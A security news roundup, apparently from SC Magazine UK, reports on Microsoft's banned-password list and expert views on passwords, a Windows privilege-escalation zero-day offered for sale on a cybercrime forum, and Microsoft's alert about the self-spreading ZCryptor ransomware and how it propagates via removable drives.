This concern is reinforced by the recent discovery of a password reuse bot with the ability to test leaked credentials on the dark web targeting multiple websites. The credential testing runs on poorly protected sites and then successful hits are taken to highly secured sites in the hope that the same passwords can be used over and over.

Brian Spector, CEO of Miracl, wrote to SCMagazineUK.com, “Although it is great that Microsoft is trying to increase security and awareness in this way .... complex passwords are inconvenient, which is why people are failing to adopt them.”

“Consumers tell us that they are struggling to remember what is now an average of over 100 passwords in Europe. At a time when the number of devices we own is rising sharply, this frustration has relegated the registration process to being the most broken thing about the internet,” Richard Lack, director of sales - EMEA, Gigya, commented in an email to SC.

Whilst Jonathan Sander, VP of product strategy at Lieberman Software, considers Microsoft's move excellent and hopes the fruits of this effort become open to all, he has an interesting comment on the timing of the announcement. “I imagine that Microsoft is only instituting its banned password list now because there is enough political capital to do it with so many breaches and stolen passwords in the news,” he said.

On the other hand, some researchers question the password infrastructure. “Microsoft's move doesn't fix the underlying problem that passwords just aren't secure enough to protect the personal information that we all store and access online today,” Spector said.

Dave Worrall, CTO of Secure Cloudlink in a comment sent to SC argues, “It's therefore time to completely rethink the entire password-driven security system. Passwords have quickly transitioned into an indefensible means of user authentication because of their basic security vulnerabilities”. He added: “Now is the time to look at solutions that eliminate the need for the password in the first place.”

“Within the next 10 years, traditional passwords will be dead as an authentication form. Consumer-focused brands require modern customer identity management infrastructures that support newer, more secure authentication methods, such as biometrics,” Patrick Salyer, CEO at Gigya, wrote to SC.

--Hackers offering Microsoft Windows zero-day exploit for $90,000 (May-31-2016)

A cybercriminal is offering up what may well be a valid zero-day exploit for $90,000 that supposedly is effective against almost every version of Microsoft Windows now in use.

Trustwave researchers said the criminal group's claim that the exploit works on all iterations of the Windows operating system from Windows 2000 to 10 is most likely valid and the security firm expects someone to pay the asking price. The item was first spotted on May 11 on a Russian cybercrime website with an initial price of $95,000, but this was lowered to $90,000 on May 23.

“Based on this and the prices we know about, the price here seems on the high end but still within a realistic price range, especially considering the return on investment criminals are likely to make using this exploit in any campaign,” Trustwave wrote.

The exploit is a local privilege escalation (LPE) zero-day for systems running 32-bit versions of the operating system. An LPE is particularly dangerous because, when combined with other malware, it can be used in almost any kind of attack.

“While the most coveted zero day would be a Remote Code Execution (RCE) exploit, Local Privilege Escalation vulnerabilities are likely next in line in popularity. Although such an exploit can't provide the initial infection vector like a Remote Code Execution would, it is still a very much needed puzzle piece in the overall infection process,” Trustwave wrote.

Since this is a case of criminals selling to criminals, the seller tries to build some level of trust into the deal by including two videos that supposedly show the exploit functioning properly. The first shows a Windows 10 system being exploited and the second shows the exploit bypassing all of Microsoft's Enhanced Mitigation Experience Toolkit (EMET) protections included in Windows 10.

Those behind the exploit say it will be sold only to a single buyer, who for $90,000 will receive the source code for the exploit and the demo, free updates that will address any security improvements added to Windows, a detailed write-up of the vulnerability, and complimentary consultation on integrating the exploit.

--Microsoft warns of new, self-propagating ransomware in the wild (May-27-2016)

A new version of ransomware, dubbed Ransom:Win32/ZCryptor.A, that is able to move itself from computer to computer is hitting Microsoft Windows users.

Microsoft's Threat Research & Response blog issued an alert to its customers on May 26 warning them of the malware, which also goes by the name ZCryptor. The nastiest aspect of this piece of malware is its ability to reproduce and then spread to other systems through removable media devices, such as flash drives, as well as network drives. This capability is not often seen, noted Trend Micro researcher Michael Jay Villanueva.

“This ransomware is one of the few ransomware families that is capable of spreading on its own. It drops a copy of itself in removable drives, making use of USBs a risky practice,” he said in a research note on the ransomware.

Trend Micro gave ZCryptor an overall risk rating of critical with a high damage potential.

The ransomware has several infection vectors. Microsoft noted it can be distributed via spam emails, macro malware or fake Flash Player installers. When it tries to spread through removable storage devices it “drops autorun.inf in removable drives, a zycrypt.lnk in the start-up folder: %User Startup%\zcrypt.lnk along with a copy of itself as {Drive}:\system.exe and %appdata%\zcrypt.exe, and changes the file attributes to hide itself from the user in file explorer,” the Microsoft report said.

Once embedded and the files are encrypted a ransom note appears demanding 1.2 bitcoins, around $500, for the decryption key. It gives the victim four days to comply and then boosts the payment to five Bitcoins.